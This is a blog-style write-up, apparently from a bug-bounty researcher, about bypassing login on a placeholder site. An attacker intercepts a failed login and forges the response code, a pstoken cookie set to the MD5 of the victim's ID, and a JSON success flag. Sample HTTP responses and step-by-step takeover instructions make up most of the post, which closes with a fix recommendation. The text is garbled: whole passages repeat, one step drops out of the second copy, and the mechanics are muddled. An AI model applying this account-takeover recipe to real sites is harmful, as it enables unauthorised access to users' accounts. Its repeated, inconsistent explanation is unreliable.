Authentication Bypass Using Login Validation Process Prediction
Attackers Login ID: attackerloginid md5 hash value:
Original Server Response Using Attackers Account with Wrong Password:
HTTP/1.1 200 OK
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
{"failed":false}
Original Response Using Attackers Account with Right Password:
HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
{"success":true}
Modified Response in which the attacker modified the Response Code, Set-Cookies & there Values, Status Code Values and Sent it as a Request:
HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
{"success":true}
Suggestions and Feedbacks are welcome.
While researching and working on bug bounties in late Dec 2012, I have found a way to Bypass Authentication using which we can Takeover all the
users account of a website if that site is vulnerable to this type of
attack.
Using
this vulnerability the attacker can predict the login validation process for any victims account by combinding various techniques and in this way he can also Bypass Authentication of
all passwords of all the accounts and can successfully compromise the
victims account as the login validation process is predictable by the attacker.
I tried various techniques to Bypass the Login like Response Code Modification, Arbitrary Methods Usages but all these techniques failed so the challenge was to understand the Login Validation Process and to find a weakness in it. So now I am mentioning how I was able to Bypass the Authentication.
I tried various techniques to Bypass the Login like Response Code Modification, Arbitrary Methods Usages but all these techniques failed so the challenge was to understand the Login Validation Process and to find a weakness in it. So now I am mentioning how I was able to Bypass the Authentication.
Please Note: There was a precondition that an attacker shall now the victims login id or user id only.
Steps to Execute the Attack:
For login validation process analysis I created 2 test accounts.
1. 1st we will send the login request using our own account attackerloginid with a wrong password while intercepting the response for the wrong password using the below mentioned login link.
https://testsite.com/login.jsp
2. Using which I found that if the password is wrong then the server response code is 200 OK, Set-Cookie named pstoken value is null which is generated once and the status code value is json based as following {"failed":false}.
3. Now the we will send the login request using our own account attackerloginid with a right password while intercepting the response for the right password using the below
mentioned login link.
https://testsite.com/login.jsp
4. Using which I found that if the password is right then the server response code is 302 Found, Set-Cookie named pstoken value is attackers user id or login id md5 hash value is 636559678682db9e21c958a4df44eea4 which is generated twice and the status code value is json based as following {"success":true}.
5. As now we are able to find the variation between the wrong and right passwords server responses so you now we can Predict the Login Validation Process for the right password.
So in simple words now the attacker will try to login into the victims account using the login Url and victims user id or login id which is victimloginid with a wrong password while intercepting the response using any web proxy and he will get the server response code as 200 OK with a Set-Cookie named pstoken with a null value which is generated once and with a status code value in json as following {"failed":false}.
So now the attacker will modify the response code value 200 OK to 302 Found, will add the Set-Cookie twice which is named as pstoken whose value he will change from null to victims user id or login id md5 hash value which is e9fc2abd9060fde1a67e3367b7d64bd0 and after that he will modify the status code value from {"failed":false} to {"success":true} and forward the request using any web proxy, now the attacker successfully logs into the victims account.
So in this way we can easily Bypass the Authentication :).
1. 1st we will send the login request using our own account attackerloginid with a wrong password while intercepting the response for the wrong password using the below mentioned login link.
https://testsite.com/login.jsp
2. Using which I found that if the password is wrong then the server response code is 200 OK, Set-Cookie named pstoken value is null which is generated once and the status code value is json based as following {"failed":false}.
https://testsite.com/login.jsp
4. Using which I found that if the password is right then the server response code is 302 Found, Set-Cookie named pstoken value is attackers user id or login id md5 hash value is 636559678682db9e21c958a4df44eea4 which is generated twice and the status code value is json based as following {"success":true}.
5. As now we are able to find the variation between the wrong and right passwords server responses so you now we can Predict the Login Validation Process for the right password.
So in simple words now the attacker will try to login into the victims account using the login Url and victims user id or login id which is victimloginid with a wrong password while intercepting the response using any web proxy and he will get the server response code as 200 OK with a Set-Cookie named pstoken with a null value which is generated once and with a status code value in json as following {"failed":false}.
So now the attacker will modify the response code value 200 OK to 302 Found, will add the Set-Cookie twice which is named as pstoken whose value he will change from null to victims user id or login id md5 hash value which is e9fc2abd9060fde1a67e3367b7d64bd0 and after that he will modify the status code value from {"failed":false} to {"success":true} and forward the request using any web proxy, now the attacker successfully logs into the victims account.
So in this way we can easily Bypass the Authentication :).
Attackers Login ID: attackerloginid md5 hash value:
636559678682db9e21c958a4df44eea4
Victims Login ID: victimloginid md5 hash value:
e9fc2abd9060fde1a67e3367b7d64bd0
Original Server Response Using Attackers Account with Wrong Password:
HTTP/1.1 200 OK
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
{"failed":false}
Original Response Using Attackers Account with Right Password:
HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
{"success":true}
Modified Response in which the attacker modified the Response Code, Set-Cookies & there Values, Status Code Values and Sent it as a Request:
HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
{"success":true}
Impact:
The Login Validation Process is Predictable using which an attacker can easily compromise any users account of the Application.
Recommendation:
The Login Validation shall not be dependent on Response Code Values, Cookies Values and Json Based Status Code values etc combination. Also the it shall not be dependent on the Client-Side Validation instead proper Server-Side Validation shall be done for the Correct Passwords.
So in this way one can Takeover or Bypass the authentication of any victims accounts using the Using Login Validation Process Prediction also this way can be used
to find same type of
vulnerabilities on many different websites.
Suggestions and Feedbacks are welcome.
Nice one buddy :)
ReplyDelete